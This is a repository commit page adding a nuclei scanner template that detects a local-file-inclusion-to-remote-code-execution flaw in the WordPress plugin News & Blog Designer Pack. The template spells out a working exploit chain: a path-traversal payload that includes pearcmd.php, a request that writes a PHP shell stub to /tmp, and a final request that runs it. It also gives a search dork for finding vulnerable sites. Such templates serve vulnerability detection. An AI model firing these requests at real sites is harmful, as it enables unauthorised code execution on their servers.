daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8477 from iamnoooob/main 

News and blog designer pack Wordpress plugin - LFI leading to RCE
patch-1
Dhiyaneshwaran 2023-10-27 11:59:21 +05:30 committed by GitHub
parent d9b794cd48 923da93943
commit 7c9026c71e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 51 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

51
http/vulnerabilities/wordpress/blog-designer-pack-rce.yaml Normal file
View File

@ -0,0 +1,51 @@
id: blog-designer-pack-rce
info:
name: News & Blog Designer Pack < 3.4.2 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
News & Blog Designer Pack contains a local file inclusion vulnerability via user controlled $design variable extracted by POST parameter 'shrt_param' leading to Remote Code Execution via pearcmd.php. The vulnerability occurs within bdp_get_more_post function inside file bdp-ajax-functions.php.
reference:
- https://twitter.com/frycos/status/1717571552470819285
- https://wordpress.org/plugins/blog-designer-pack/
metadata:
google-query: inurl:"/wp-content/plugins/blog-designer-pack/"
verified: true
tags: wordpress,wp-plugin,lfi,wp,blogdesignerpack,rce,intrusive
variables:
randomstr: "{{randstr_1}}"
marker: "{{base64(randomstr)}}"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=bdp_get_more_post
- |
POST /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
&action=bdp_get_more_post&shrt_param[design]=../../../../../../../../usr/local/lib/php/pearcmd
- |
POST /wp-admin/admin-ajax.php?0={{marker}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
&action=bdp_get_more_post&shrt_param[design]=../../../../../../../../tmp/{{randstr}}
matchers:
- type: dsl
dsl:
- 'contains(body_1, "\"success\":0")'
- 'contains(body_2,"channel pear.php.net")'
- 'contains_all(body_3, "{{randomstr}}", "success\":1")'
- 'contains(header_3, "application/json")'
condition: and